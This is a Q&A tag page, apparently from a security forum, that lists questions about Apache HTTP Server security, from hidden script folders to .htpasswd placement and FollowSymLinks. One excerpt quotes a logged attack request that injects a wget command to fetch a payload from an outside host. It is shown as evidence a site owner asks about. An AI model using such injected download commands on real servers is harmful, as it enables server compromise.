Questions tagged [apache]

Questions about the security of Apache open source software, especially Apache HTTP Server

The Apache Software Foundation maintains a number of open source software projects, notably including the Apache HTTP Webserver.

Apache has been the most popular web server on the Internet since April of 1996.

http://www.apache.org/

530 questions
15 votes, 4 answers

(How) Can outsiders discover the pages that are being hosted on my server?

I have a web site hosted from my server. Sometimes, I upload database manipulation scripts to a folder which is three levels deep in the website and run them using my web browser. These scripts should not be accessed by outside users and I remove…
Hoytman
10 votes, 3 answers

Is Apache vulnerable to CVE-2015-1781?

Is Apache vulnerable to CVE-2015-1781 (buffer overflow in the gethostbyname_r() family of functions)? How can I quickly check if a system of mine is secure?
chenwen2
10 votes, 1 answer

Very long HEAD request in server logs: What is the intention?

I'm getting logs like (using Apache server): 119.131.152.148 - - [20/Apr/2016:18:17:47 +0900] "HEAD…
lepe
6 votes, 5 answers

How to secure test/dev environments from outside world?

I would like to set up a security barrier to my test/dev environments. I'm under a more or less typical LAMP on dedicated servers. Thing is, I have some Facebook apps, a widget for other devices, and other apps that need to connect to my site via an…
Co Lega
6 votes, 1 answer

Does installing Apache on my local machine create new security risks?

I am developing a small LAMP online app, and so far I have been doing all the development online. I am considering installing Apache/PHP/MySQL on my Ubuntu machine to be able to develop locally as well, but I am wondering if by installing Apache on…
6 votes, 2 answers

How to get site's 'real' URL (before being rewritten)

If a site uses a .htaccess file to rewrite the URL, e.g. for better SEO, is it possible to find out what the "real" URL is?
user7411
5 votes, 1 answer

Apache webserver behind firewall is a victim of proxy abuse and cannot use fail2ban to solve it

We have a new client with a webserver that's getting too much proxy abuse. The access_log is filled with these kinds of lines: 64.187.XXX.XXX - - [12/May/2015:10:32:10 -0300] "GET https://ads.exoclick.com:443/ads.js HTTP/1.0" 404 204…
oscillat0r
5 votes, 1 answer

Is it alright to put .htpasswd in the protected directory if there's just one user?

I'm setting up a directory on an Apache server protected with mod_authn_file. The docs for AuthUserFile say not to put the .htpasswd file in the protected directory: Make sure that the AuthUserFile is stored outside the document tree of the…
Robert
4 votes, 2 answers

Security benefits by loading modules statically in Apache server

In the Apache httpd webserver there are two ways to load modules into the server, static and dynamic. There are some modules which must be loaded statically, e.g. mod_so and core. The mod_so must be loaded to enable dynamic loading of modules, but it is…
Thomas K
4 votes, 3 answers

Apache logs, suspicious logging apach0day

Today I received this: 16X.XXX.XX.77 - - [28/Jul/2014:--:--:--] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 3596 "-" "chroot-apach0day" so with HTTP_USER_AGENT: chroot-apach0day REQUEST_URI:…
ptx
4 votes, 1 answer

What attacks is new Apache 2.0 vulnerable to?

I am new to the security field and still learning how all the attacks work. For my testing, I have implemented Apache 2.0 on a CentOS virtual machine. I have created another machine using FreeBSD, where I have installed honeyd to create honeypots. I…
Riley Willow
3 votes, 1 answer

Apache, DocumentRoot and path traversal - /manual/ query

A PCI scanner of a client is currently showing a potential path traversal exploit. The document root is set to /home/somefolder/somewebfoldername/ YET, visiting ourwebsite.com/manual shows the Apache manual. The same goes for…
flukeflume
3 votes, 1 answer

Checking if Mod_Rewrite is Enabled Remotely

When pentesting it is useful to know when Apache mod_rewrite is enabled. But when one comes across a web server that does not utilize PHP it is difficult to tell if mod_rewrite is enabled considering that URL redirection isn't very necessary. Is…
Bhubhu Hbuhdbus
2 votes, 1 answer

What are the consequences of turning on Apache AllowEncodedSlashes?

What are the consequences of turning on Apache AllowEncodedSlashes? I want to turn it on and I want to know if this is any worse than any of the other kinds of injection attacks that may occur in web apps?
Casebash
2 votes, 1 answer

What is the security problem of Options FollowSymLinks in the Apache configuration?

What is the security problem with using Options FollowSymLinks in the Apache configuration? We use the following configuration: AllowOverride None Options None FollowSymLinks
Michael